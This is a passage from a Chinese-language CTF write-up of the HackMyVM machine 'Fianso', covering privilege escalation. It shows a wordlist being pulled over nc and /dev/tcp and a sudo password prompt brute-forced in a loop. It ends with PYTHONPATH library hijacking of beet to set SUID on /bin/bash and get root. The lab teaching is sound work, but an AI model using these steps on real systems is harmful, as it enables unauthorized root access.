"sofiane ALL=(ALL:ALL) NOPASSWD:SETENV: \/usr\/bin\/beet " >> \/etc\/sudoers \necho -e "Sudo rights granted !\\n"\nelse\necho -e "Wrong password\\n" && exit 1\nfi\n(remote) sofiane@fianso:\/home\/sofiane$ file \/usr\/bin\/beet\n\/usr\/bin\/beet: symbolic link to ..\/share\/beets\/beet<\/code><\/pre>\n\u7206\u7834\u5bc6\u7801<\/h3>\n
\u5c1d\u8bd5\u8fdb\u884c\u8fd0\u884c\uff0c\u53d1\u73b0\u751f\u6210\u4e86\u914d\u7f6e\u6587\u4ef6\uff1a<\/p>\n
(remote) sofiane@fianso:\/home\/sofiane$ sudo \/bin\/bash \/opt\/harness\nAuthentication to manage music collection.\n\nDate: 08\/06\/24\nUser: root\nHost: fianso\n\nMaster's password:\n(remote) sofiane@fianso:\/home\/sofiane$ ls -la \/opt\/passwordBox\/password\nls: cannot access '\/opt\/passwordBox\/password': Permission denied\n(remote) sofiane@fianso:\/home\/sofiane$ ls -la \/opt\/config.conf\n-rwx------ 1 root root 43 Aug 6 04:54 \/opt\/config.conf<\/code><\/pre>\n\u5c31\u662f\u8bf4\u5bc6\u7801\u4e0d\u5bf9\uff0c\u914d\u7f6e\u6587\u4ef6\u4e00\u517143\u4e2a\u5b57\u8282\uff0c\u5176\u4e2d\u524d\u9762\u768412\u4e2a\u5b57\u8282\u4e3a\u56fa\u5b9a\u5b57\u8282\uff1afianso:root:<\/code>\uff0c\u518d\u52a0\u4e0aecho\u7684\u7279\u5f81\uff1a<\/p>\n\necho<\/code>\u8f93\u51fa\u4e1c\u897f\u81ea\u5e26\u6362\u884c\u7b26\uff0c\u6dfb\u52a0-n<\/code>\u9009\u9879\u4e0d\u5e26\u6362\u884c\u7b26\u3002<\/p>\n<\/blockquote>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Fianso]\n\u2514\u2500$ echo "test" > test1 \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Fianso]\n\u2514\u2500$ echo -n "test" > test2\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Fianso]\n\u2514\u2500$ ls -la test1 test2 \n-rw-r--r-- 1 kali kali 5 Aug 5 23:30 test1\n-rw-r--r-- 1 kali kali 4 Aug 5 23:30 test2<\/code><\/pre>\n\u8fd9\u6837\u7684\u8bdd\u5c31\u670913\u4e2a\u5b57\u8282\u4e86\uff0c\u5c1d\u8bd5\u7206\u7834\u4e00\u4e0b30\u4e2a\u5b57\u7b26\u7684\u5f31\u5bc6\u7801\uff0c\u5c1d\u8bd5\u5728rockyou<\/code>\u91cc\u9762\u627e\u4e00\u4e0b\uff1a<\/p>\n# kali\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Fianso]\n\u2514\u2500$ grep -E '^.{30}$' \/usr\/share\/wordlists\/rockyou.txt > rockyou_30.txt\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Fianso]\n\u2514\u2500$ nc -lp 8888 < rockyou_30.txt \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Fianso]\n\u2514\u2500$ ls -la rockyou_30.txt \n-rw-r--r-- 1 kali kali 22109 Aug 5 23:34 rockyou_30.txt<\/code><\/pre>\n# fianso\n(remote) sofiane@fianso:\/home\/sofiane$ hostname\nfianso\n(remote) sofiane@fianso:\/home\/sofiane$ cd \/tmp\n(remote) sofiane@fianso:\/tmp$ cat < \/dev\/tcp\/172.20.10.8\/8888 > rockyou_30.txt\n^C\n(remote) sofiane@fianso:\/tmp$ ls -la\ntotal 60\ndrwxrwxrwt 9 root root 4096 Aug 6 05:38 .\ndrwxr-xr-x 18 root root 4096 Nov 14 2022 ..\ndrwxrwxrwt 2 root root 4096 Aug 6 04:05 .font-unix\ndrwxrwxrwt 2 root root 4096 Aug 6 04:05 .ICE-unix\n-rw-r--r-- 1 sofiane sofiane 22109 Aug 6 05:38 rockyou_30.txt\ndrwx------ 3 root root 4096 Aug 6 04:05 systemd-private-f4b7babe36d84f9195cb0c2717feab1d-systemd-logind.service-LU0rnf\ndrwx------ 3 root root 4096 Aug 6 04:05 systemd-private-f4b7babe36d84f9195cb0c2717feab1d-systemd-timesyncd.service-2vutgi\ndrwxrwxrwt 2 root root 4096 Aug 6 04:05 .Test-unix\ndrwxrwxrwt 2 root root 4096 Aug 6 04:05 .X11-unix\ndrwxrwxrwt 2 root root 4096 Aug 6 04:05 .XIM-unix<\/code><\/pre>\n\u7136\u540e\u8fdb\u884c\u7206\u7834\uff0c\u56e0\u4e3a\u6211\u4eec\u53ea\u9700\u8981\u89e6\u53d1\u5c31\u884c\u4e86\uff0c\u6240\u4ee5\u53ef\u4ee5\u76f4\u63a5\u7206\u7834\uff1a<\/p>\n
(remote) sofiane@fianso:\/tmp$ for i in $(cat .\/rockyou_30.txt); do echo $i | sudo \/bin\/bash \/opt\/harness; done\n.........\n(remote) sofiane@fianso:\/tmp$ sudo -l\nMatching Defaults entries for sofiane on fianso:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser sofiane may run the following commands on fianso:\n (ALL : ALL) NOPASSWD: \/bin\/bash \/opt\/harness\n (ALL : ALL) SETENV: NOPASSWD: \/usr\/bin\/beet\n(remote) sofiane@fianso:\/tmp$ cat \/usr\/bin\/beet\n#!\/usr\/bin\/python3\n# EASY-INSTALL-ENTRY-SCRIPT: 'beets==1.4.9','console_scripts','beet'\n__requires__ = 'beets==1.4.9'\nimport re\nimport sys\nfrom pkg_resources import load_entry_point\n\nif __name__ == '__main__':\n sys.argv[0] = re.sub(r'(-script\\.pyw?|\\.exe)?$', '', sys.argv[0])\n sys.exit(\n load_entry_point('beets==1.4.9', 'console_scripts', 'beet')()\n )<\/code><\/pre>\n\u52ab\u6301\u73af\u5883\u53d8\u91cf<\/h3>\n
\u56e0\u4e3a\u53ef\u4ee5\u8bbe\u7f6e\u73af\u5883\u53d8\u91cf\uff0c\u6240\u4ee5\u53ef\u4ee5\u5c1d\u8bd5\u52ab\u6301\u5e93\u6587\u4ef6\uff1a<\/p>\n
(remote) sofiane@fianso:\/tmp$ nano sys.py\n(remote) sofiane@fianso:\/tmp$ cat sys.py\nimport os\nos.system("chmod +s \/bin\/bash")\n(remote) sofiane@fianso:\/tmp$ sudo PYTHONPATH=\/tmp\/ \/usr\/bin\/beet\nUsage: \n beet COMMAND [ARGS...]\n beet help COMMAND\n\nOptions:\n --format-item=FORMAT_ITEM\n print with custom format\n --format-album=FORMAT_ALBUM\n print with custom format\n -l LIBRARY, --library=LIBRARY\n library database file to use\n -d DIRECTORY, --directory=DIRECTORY\n destination music directory\n -v, --verbose log more details (use twice for even more)\n -c CONFIG, --config=CONFIG\n path to configuration file\n -h, --help show this help message and exit\n\nCommands:\n config show or edit the user configuration\n fields show fields available for queries and format strings\n help (?) give detailed help on a specific sub-command\n import (imp, im) import new music\n list (ls) query the library\n modify (mod) change metadata fields\n move (mv) move or copy items\n remove (rm) remove matching items from the library\n stats show statistics about the library or a query\n update (upd, up) update the library\n version output version information\n write write tag information to files\n(remote) sofiane@fianso:\/tmp$ ls -la \/bin\/bash\n-rwxr-xr-x 1 root root 1234376 Mar 27 2022 \/bin\/bash\n(remote) sofiane@fianso:\/tmp$ nano re.py\n(remote) sofiane@fianso:\/tmp$ sudo PYTHONPATH=\/tmp\/ \/usr\/bin\/beet\nTraceback (most recent call last):\n File "\/usr\/bin\/beet", line 6, in <module>\n from pkg_resources import load_entry_point\n File "\/usr\/lib\/python3\/dist-packages\/pkg_resources\/__init__.py", line 23, in <module>\n import zipfile\n File "\/usr\/lib\/python3.9\/zipfile.py", line 7, in <module>\n import importlib.util\n File "\/usr\/lib\/python3.9\/importlib\/util.py", line 2, in <module>\n from . import abc\n File "\/usr\/lib\/python3.9\/importlib\/abc.py", line 17, in <module>\n from typing import Protocol, runtime_checkable\n File "\/usr\/lib\/python3.9\/typing.py", line 2196, in <module>\n Pattern = _alias(stdlib_re.Pattern, 1)\nAttributeError: module 're' has no attribute 'Pattern'\n(remote) sofiane@fianso:\/tmp$ ls -la \/bin\/bash\n-rwsr-sr-x 1 root root 1234376 Mar 27 2022 \/bin\/bash\n(remote) sofiane@fianso:\/tmp$ bash -p\n(remote) root@fianso:\/tmp# cd ~\n(remote) root@fianso:\/home\/sofiane# whoami;id\nroot\nuid=1001(sofiane) gid=1001(sofiane) euid=0(root) egid=0(root) groups=0(root),1001(sofiane)\n(remote) root@fianso:\/home\/sofiane# cd \/root\n(remote) root@fianso:\/root# ls -la\ntotal 32\ndrwx------ 5 root root 4096 Dec 24 2022 .\ndrwxr-xr-x 18 root root 4096 Nov 14 2022 ..\nlrwxrwxrwx 1 root root 9 Dec 13 2022 .bash_history -> \/dev\/null\n-rw-r--r-- 1 root root 602 Dec 21 2022 .bashrc\ndrwxr-xr-x 3 root root 4096 Dec 24 2022 .config\ndrwxr-xr-x 3 root root 4096 Dec 13 2022 .local\n-rw-r--r-- 1 root root 161 Jul 9 2019 .profile\n-rwx------ 1 root root 33 Dec 24 2022 root.txt\ndrwx------ 2 root root 4096 Dec 24 2022 .ssh<\/code><\/pre>\n\u6210\u529f\uff01<\/p>\n
\u53c2\u8003<\/h2>\n
https:\/\/www.bilibili.com\/video\/BV1Hf421f716\/<\/a><\/p>\nhttps:\/\/github.com\/HosseinVampire\/Writeups\/blob\/main\/Hackmyvm\/Machines\/Fianso\/Ctf.md<\/a><\/p>\n
![\"image-20240806101546276\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408061208847.png\")
<\/div><\/p>\n![\"image-20240806104437035\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408061208848.png\")
<\/div><\/p>\n